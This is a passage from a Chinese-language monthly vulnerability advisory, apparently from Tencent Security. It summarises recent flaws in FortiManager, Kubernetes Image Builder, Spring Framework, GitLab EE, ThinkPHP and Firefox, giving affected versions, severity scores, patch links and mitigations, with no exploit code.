Fortinet 网络设备(如防火墙、交换机和入侵防御系统等)的配置、管理和监控。FortiManager 支持大规模网络环境,能够高效地部署安全策略、监控网络活动并快速响应潜在威胁。其自动化功能减少了人为错误,提高了操作效率,并确保网络安全策略的一致性和合规性。此外,FortiManager 还具备强大的报告和分析工具,帮助管理员深入了解网络性能和安全状况,从而做出明智的决策。 + +据描述,该漏洞源于Fortinet FortiManager存在代码缺陷,未授权的攻击者可以通过发送特制的请求绕过权限校验,最终远程执行任意代码。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
已发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.8
+ +**影响版本:** + +6.2.0 <= FortiManager <= 6.2.12 + +6.4.0 <= FortiManager <= 6.4.14 + +7.0.0 <= FortiManager <= 7.0.12 + +7.2.0 <= FortiManager <= 7.2.7 + +7.4.0 <= FortiManager <= 7.4.4 + +FortiManager 7.6.0 + +6.4.1 <= FortiManager Cloud <= 6.4.7 + +7.0.1 <= FortiManager Cloud <= 7.0.12 + +7.2.1 <= FortiManager Cloud <= 7.2.7 + +7.4.1 <= FortiManager Cloud <= 7.4.4 + +**修复建议:** + +1. 官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + +https://www.fortiguard.com/psirt/FG-IR-24-423 + +2. 临时缓解方案: + +- 可信内部IP地址访问和通信。 + +- 未知的 FortiGate 设备禁止与FortiManager关联。 + +**六、Kubernetes Image Builder****默认凭据登录漏洞** + +**** +**** +**概述:** + +腾讯安全近期监测到Kubernetes官方发布了关于Kubernetes Image Builder的风险公告,漏洞编号为TVD-2024-27991 (CVE编号:CVE-2024-9486,CNNVD编号:CNNVD-202410-1533),成功利用此漏洞的攻击者,最终可登录并控制容器环境。 + +Kubernetes Image Builder 是一个用于自动化构建和推送容器镜像的工具,旨在简化 Kubernetes 应用程序的部署和管理过程。它提供了一个声明式的配置方式,使开发人员能够轻松定义镜像构建的步骤和依赖项,并自动执行构建、测试和推送操作。通过 Kubernetes Image Builder,团队可以更高效地管理容器镜像的生命周期,确保镜像的安全性和一致性,从而提升整个开发和部署流程的效率。Proxmox Provider是一款开源的虚拟化管理平台,提供了强大的硬件虚拟化和容器化功能。Proxmox Provider提供了一个直观的 Web 界面和命令行工具,简化了镜像容器的创建、管理和监控过程。 + +据描述,该漏洞源于Kubernetes Image Builder在镜像构建过程中使用默认凭据,通过Proxmox Provider创建的虚拟机镜像不会禁用或修改默认凭据,攻击者可以使用该凭据通过SSH连接到创建的虚拟环境,从而获得虚拟环境的权限。 + +PS :只有当Kubernetes 集群的节点使用通过Image Builder项目及其Proxmox provider创建的VM镜像时,Kubernetes集群才会受到该漏洞影响。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
未发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.8
+ +**影响版本:** + +Kubernetes Image Builder <= 0.1.37 + + +**修复建议:** + +1. 官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + +https://github.com/kubernetes-sigs/image-builder/releases/ + +2. 临时缓解方案: + +- 更改builder账户密码或删除builder账户。 + +- 禁止builder用户SSH访问。 + +**七、****Spring Framework 路径遍历漏洞** + +**** +**** +**概述:** + +腾讯安全近期监测到Spring官方发布了关于Spring Framework的风险公告,漏洞编号为 TVD-2024-31920 (CVE编号:CVE-2024-38819)。成功利用此漏洞的攻击者,最终遍历读取系统上的文件。 + +Spring Framework是一个开源的Java应用程序开发框架,它通过提供广泛的基础设施支持和丰富的功能,简化了Java开发过程。Spring Framework旨在构建可扩展、松耦合和易于测试的应用程序。从简单的Web应用,到复杂的企业级系统,都适合使用Spring Framework开发。 + +当 Spring Framework使用WebMvc.fn 或 WebFlux.fn 提供静态资源时,容易受到路径遍历攻击,攻击者可以构造恶意请求获取目标系统上由Spring正在运行的进程访问的文件,从而导致信息泄露。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
未发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
7.5
+ +**影响版本:** + +5.3.0 <= Spring Framework <= 5.3.40 + +6.0.0 <= Spring Framework <= 6.0.24 + +6.1.0 <= Spring Framework <= 6.1.13 + +P.S. 其他官方已不支持的旧版本也受此漏洞影响 + +**修复建议:** + +1. 官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + +https://github.com/spring-projects/spring-framework/tags + +2. 临时缓解方案: + +- 使用Spring Security HTTP 防火墙并配置相应安全规则。 + +- 将应用程序部署在 Tomcat 或 Jetty 上运行。 + +**八、****GitLab EE 权限绕过漏洞** + +**** +**** +**概述:** + +腾讯安全近期监测到Gitlab官方发布了关于GitLab EE的风险公告,漏洞编号为TVD-2024-27572 (CVE编号:CVE-2024-9164,CNNVD编号:CNNVD-202410-1130)。成功利用此漏洞的攻击者,可以获取敏感信息甚至执行恶意代码。 + +GitLab EE是GitLab公司推出的企业级版本,它提供了全面的源代码管理和协作功能,专为满足大型组织和企业的需求而设计。GitLab EE支持多人协作开发,提供强大的分支管理、代码审查、持续集成/持续部署(CI/CD)以及监控和安全防护等功能。此外,EE版本还包含额外的企业级特性,如高可用性架构、细粒度的权限控制、单点登录集成以及合规性报告等,确保企业在利用GitLab进行软件开发时能够达到最高的安全标准和效率。 + +据描述,该漏洞源于GitLab EE存在代码缺陷,在某些情况下,攻击者利用该漏洞以其他用户的身份在GitLab的任意分支上执行pipelines。这可能导致恶意代码的执行或敏感信息的泄露。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
未公开
PoC
未公开
在野利用
未发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.6
+ +**影响版本:** + +12.5 <= GitLab EE < 17.2.9 + +17.3 <= GitLab EE < 17.3.5 + +17.4 <= GitLab EE < 17.4.2 + +**修复建议:** + +官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + +https://about.gitlab.com/releases/2024/10/09/patch-release-gitlab-17-4-2-released/ + +**九、****ThinkPHP反序列化漏洞** + +**** +**** +**概述:** + +腾讯安全近期监测到关于ThinkPHP的风险公告,漏洞编号为 TVD-2024-29996 (CVE编号:CVE-2024-48112,CNNVD编号:CNNVD-202410-3502)。成功利用此漏洞的攻击者,最终可远程执行任意代码。 + +ThinkPHP是中国顶想信息科技公司的一套基于PHP的、开源的、轻量级Web应用程序开发框架,旨在简化企业级应用的开发过程。它采用了面向对象的编程思想和 MVC(模型-视图-控制器)设计模式,提供了丰富的功能和组件,支持快速开发和高效维护。ThinkPHP 具有良好的性能和安全性,易于上手且文档齐全,广泛应用于各类 Web 应用项目。 + +据描述,该漏洞源于ThinkPHP中的ResourceRegister类存在代码缺陷,攻击者可以通过构造恶意的序列化请求发送触发反序列化漏洞,最终远程执行任意代码。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
未发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.8
+ +**影响版本:** + + +6.1.3 <= ThinkPHP <= 8.0.4**** + + +**修复建议:** + +1. 官方暂未发布漏洞补丁及修复版本,请持续关注官方公告,待官方发布后评估业务是否受影响,酌情升级至安全版本。 + +https://www.thinkphp.cn/ + +2.  +临时缓解方案: + +- +对传入的序列化数据进行安全检查。 + +**十、****Mozilla Firefox Animation timelines释放后重用漏洞** + +**** +**** +**概述:** + +腾讯安全近期监测到Mozilla官方发布了关于Firefox的风险公告,漏洞编号为 TVD-2024-27303 (CVE编号:CVE-2024-9680,CNNVD编号:CNNVD-202410-902)。成功利用此漏洞的攻击者,最终可远程执行任意代码。 + +Firefox是一款由Mozilla基金会开发的开源网络浏览器,以其快速、安全、用户友好和高度可定制性著称。它内置了追踪保护功能,提供“私密浏览”模式,有效保护用户隐私。Firefox支持多设备同步,拥有丰富的扩展和主题,允许用户根据个人需求进行个性化设置。 + +该漏洞源于Firefox中的Animation timelines组件存在释放后重用漏洞,攻击者可通过制造恶意网页诱导受害者访问触发该漏洞,最终远程执行任意代码。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
已发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.8
+ +**影响版本:** + +Firefox < 131.0.2 + +Firefox ESR < 115.16.1 + +128.0 <= Firefox ESR < 128.3.1 + +Firefox Thunderbird < 115.16.0 + +128.0.1 <= Firefox Thunderbird < 128.3.1 + +**修复建议:** + +官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + +https://www.firefox.com.cn/ + + + + + +*** 以上漏洞的修复建议,由安全专家审核并融合了AI生成的建议。** + +*** 漏洞评分为腾讯安全研究人员根据漏洞情况作出,仅供参考,具体漏洞细节请以原厂商或是相关漏洞平台公示为准。** + +**通用的漏洞修复、防御方案建议** + + + + +腾讯安全专家推荐用户参考相关安全漏洞风险通告提供的建议及时升级修复漏洞,推荐企业安全运维人员通过腾讯云原生安全产品检测漏洞、防御漏洞武器攻击。 + + +具体操作步骤可参考以下文章指引: +https://s.tencent.com/research/report/157 + + +![](https://mmbiz.qpic.cn/mmbiz/QKDxrVYehicdAibIVUpquF6TQUwXFg6dYCrLBEiasLaVyObib9LjK08qQ7IzkYKROO93uxoEnMSl8zRCWiaY7JwgZWg/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "") + +腾讯安全威胁情报中心 + + + + + + +腾讯安全威胁情报中心是一个涵盖全球多维数据的情报分析、威胁预警分析平台。依托顶尖安全专家团队支撑,帮助安全分析人员、安全运维人员快速、准确地对可疑威胁事件进行预警、处置和溯源分析。 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/6AoQM3RKCWV06sedopZX4UKrIqOBFmKoc11DKcmpyPxAFoHambN30M6umkO7hlubfgLlibJaJsykcSXu0DLpffg/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "") + +**长按识别二维码获取第一手威胁情报** + +![](https://mmbiz.qpic.cn/mmbiz_png/vnT4hbaLoX52vS48AVEmzD0VOcopwhTp5G5d8bXXnJ5tiaTNibbgAvhrF3ia6Z9ofD7EZic0r8LRJFTPNcjBXXT2ibQ/640?wx_fmt=png "") + + + +腾讯安全攻防团队 A&D Team + + + + + + +腾讯安全攻防团队 A&D Team专注于安全前沿攻防技术研究。组内有多名深耕安全技术多年的业内专家,研究领域包含但不限于Web安全,主机安全,二进制安全,欢迎关注我们。 + + + +![](https://mmbiz.qpic.cn/mmbiz_gif/6AoQM3RKCWX1eVTgJibmTERpefy9ajPmQPOib80Kf7oz4cRQPnuW52QvoqMORViapS08HpRsLhibwiaxSAJQ0gHSicLw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + +**往期企业必修漏洞清单**[](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484608&idx=1&sn=e2a414257451ea83b81e0f6b886dba65&chksm=c2b106b6f5c68fa058be61c95996f9787d08a0615bccf740a4719e7c12a362d456ab670ce6a0&scene=21#wechat_redirect) + +- [2024年09月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247485003&idx=1&sn=5ccde4dc82fa09bd366a7f2de01ff1bb&chksm=c2b1043df5c68d2b005f4b5523973459c8717c99e881f1551c3c3d6686df0cd277c4cd62e81d&scene=21#wechat_redirect) + + +- [2024年05月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484998&idx=1&sn=a2de9bef55ae2bf0b6661b13b46158b4&chksm=c2b10430f5c68d268279ac8a466d7d7dfbe1adee2f1c020cbe2a8bcb50f67c30bc20043b881c&scene=21#wechat_redirect) + + +- [2024年04月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484992&idx=1&sn=96144229e53190c93439dbb9dbd6de65&chksm=c2b10436f5c68d20028efaf7c7851dc4d6ae1538b70df899ed24b365d0d4c1b016d4b6ab3dea&scene=21#wechat_redirect) + + +- [2024年03月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484976&idx=1&sn=7871c73733720064ba66d3875ee7a0df&chksm=c2b10446f5c68d5044eed0c05ddcbb8ef6ae9b25f1f964a545b2ed7d700c538b4ae51d725b73&scene=21#wechat_redirect) + + +- [2024年02月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484931&idx=1&sn=559cde17b20b2437e36eaaf56ef34c62&chksm=c2b10475f5c68d632698c341898ab94cf9ae0f661d0c7c9d155e6835bef47c1d34c2f376b3de&scene=21#wechat_redirect) + + +- [2024年01月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484910&idx=1&sn=d40e9b8ad7e5f67fd5ac1fc2b0b2548a&chksm=c2b10798f5c68e8ed5d26e6938ad30b8157db94bb71e3e0ccf69127e82251f3d02e173adb7fe&scene=21#wechat_redirect) + + +- [2023年12月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484886&idx=1&sn=b092ee93fcad0064151f36b65f74780d&chksm=c2b107a0f5c68eb61269571a17cf4e1b7ac4db04658aa8c62427afa160658e94a3ac48fd12a9&scene=21#wechat_redirect) + + +- [2023年11月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484817&idx=1&sn=470ccab8e76e1084e49791fca7a4ab09&chksm=c2b107e7f5c68ef1152bb2b7cb434db297094d3661ea6206f87e6847dca95fbc37efbebfafcf&scene=21#wechat_redirect) + + +- [2023年10月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484774&idx=1&sn=f29b2476fdb5d00b3ffd454a22f22f5b&chksm=c2b10710f5c68e06131a6ec198f4a18f956a4831055f2a01e9d8a7f78384307dc29c095e84ea&scene=21#wechat_redirect) + + +- [2023年09月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484608&idx=1&sn=e2a414257451ea83b81e0f6b886dba65&chksm=c2b106b6f5c68fa058be61c95996f9787d08a0615bccf740a4719e7c12a362d456ab670ce6a0&scene=21#wechat_redirect) + + +- [‍2023年08月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484516&idx=1&sn=763f65b626071bfdee432404fcdab291&chksm=c2b10612f5c68f04a17c9031a642b65a8317ee8d9acda1d6ed8719a5f5899870ca7bb27bce66&scene=21#wechat_redirect) + + +- [2023年07月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484443&idx=1&sn=6a309a5029ab2670567d199816289765&chksm=c2b1066df5c68f7b50f74899e797c12a7de169dc78d2073017e4bd59fff7c2bf1d4e4a5d3f87&scene=21#wechat_redirect) + + +- [2023年06月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484340&idx=1&sn=575160a41eba6d83606beade85419c57&chksm=c2b101c2f5c688d45a77849de896f884c6ca8b22e42b68a40d61043ead70cb2a15f0fdfcba02&scene=21#wechat_redirect) + + +- [2023年05月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484240&idx=1&sn=58c308d646302ec2a6c223ff2f9acfa6&chksm=c2b10126f5c68830eb202afa508c2c65211dafa90dd98d5cb059babe4554bde985eddf54ede2&scene=21#wechat_redirect) + + +- [2023年04月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484165&idx=1&sn=758a6119eef77796827517d9f6b5ab09&chksm=c2b10173f5c68865cd0509f6322aa791826cd8486b59d149748b7f2274de6ed8df94ec34e3c9&scene=21#wechat_redirect) + + +- [2023年03月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484108&idx=1&sn=959dd47bc264b364f3cda08b754cddb2&chksm=c2b100baf5c689acbe0773f5aed75ca8896aaef9f78157e03f5793b84b26b9a011ecd4278215&scene=21#wechat_redirect) + + +- [2023年02月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484044&idx=1&sn=71c0e4d9abeb486d200111b22a2b99b3&chksm=c2b100faf5c689ec9653bd022983d1e218259c0eca48d1d2a6f90e734c3a503af18d89b7c0f3&scene=21#wechat_redirect) + + +- [2023年01月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484042&idx=1&sn=f4c46330403271ab9b81e5d2acd5694c&chksm=c2b100fcf5c689eae75f3d293733539818e7474799e15b3e6627d53c343ae0f798410a98eec6&scene=21#wechat_redirect) + + +- [2022年12月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500731&idx=1&sn=577edf78ead4420a884e8b4ef70e419f&chksm=ec9f1ac8dbe893de15cb512053c9d5ba0d1a0cdb03c638030f5afeb080a348f170382817ee9a&scene=21#wechat_redirect) + + +- [2022年11月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247483999&idx=1&sn=cda585e804e6636a10a9603b812eb4ac&chksm=c2b10029f5c6893f0ff226e4d11cba385389ac26c735b3b34fd849236a7f2c6a48c3212aeaf8&scene=21#wechat_redirect) + + +- [2022年10月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247483997&idx=1&sn=09e3e954c20152f609b4679e6f1a4761&chksm=c2b1002bf5c6893d413203c326b976c96a7e85ed9f92d59b3335164be20948c08f33188d1917&scene=21#wechat_redirect) + + +- [2022年09月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500655&idx=1&sn=23c9cd66901955f39559146234de79a7&chksm=ec9f1a1cdbe8930a832eb4911b37f45e7143d2e463c024170dd77457416475d66df92bd5c0b7&scene=21#wechat_redirect) + + +- [2022年08月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500653&idx=1&sn=bfdcc5a1e2ae3543bd2b26912701977d&chksm=ec9f1a1edbe89308b8c8b038e92545001dc7abe631bfe78c09d2b6de199794747ed3c3c962b4&scene=21#wechat_redirect) + + +- [2022年07月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500564&idx=1&sn=0724466efc745b96cf539fe8572fdb61&chksm=ec9f1a67dbe89371975b1a84b16a636f3165a97f611425ffbec8871b3cf229c5eff4b0f29f30&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2022年06月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500393&idx=1&sn=ba17403eb5635ccce3b22b3ad540d0ac&chksm=ec9f1b1adbe8920c872b3498d103f41ff1b2a60bf3e6321d169bb0667e235f0e0947f111e01d&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2022年05月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500338&idx=1&sn=2fa717b3367276c07c87f3f2a4163431&chksm=ec9f1b41dbe8925763f9944ec19e2210152a563434ea2abf75df97b7698dc337151bb7f59c6e&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2022年04月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500304&idx=1&sn=8270ae775a0e414e259710f3def69e71&chksm=ec9f1b63dbe8927505895eb86271c7caac19ff72d42c7f89b38647c652b17c1ab74910626257&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2022年03月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500281&idx=1&sn=282cc225ecf85041a53a677fbb67df3f&chksm=ec9f188adbe8919ceb053d2086e4d42ea0a80e7ad7bfc710e18c26b832ef70138bc717efe6e2&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2022年02月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500179&idx=1&sn=4bf719ed94fe2760963d0a7e51c9d247&chksm=ec9f18e0dbe891f6beeb667a075e61e8bd0788ad02618d9f2833f1bfeed0440c9cda788e97f9&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2022年01月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500165&idx=1&sn=513ba8a312875b5a34b595701d4d5d3f&chksm=ec9f18f6dbe891e0f75ace91bccc64c25cae3a8106a3bd58e9f744ac17e657c47201bc79564d&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2021年12月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500086&idx=1&sn=34cc2a0ff0918c369809ce486a7437d4&chksm=ec9f1845dbe89153689a4d4c3519c571018f08f3b1c2567cd783c3f90e17503e0087cce8fba2&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2021年11月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247499883&idx=1&sn=b5d1d0d4ac8a6e1e549817e10a57f3af&chksm=ec9f1918dbe8900e89b7d5ac1edaeb59e1fdc7838f47f859e70564a6c8b785065bd126de6bed&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + +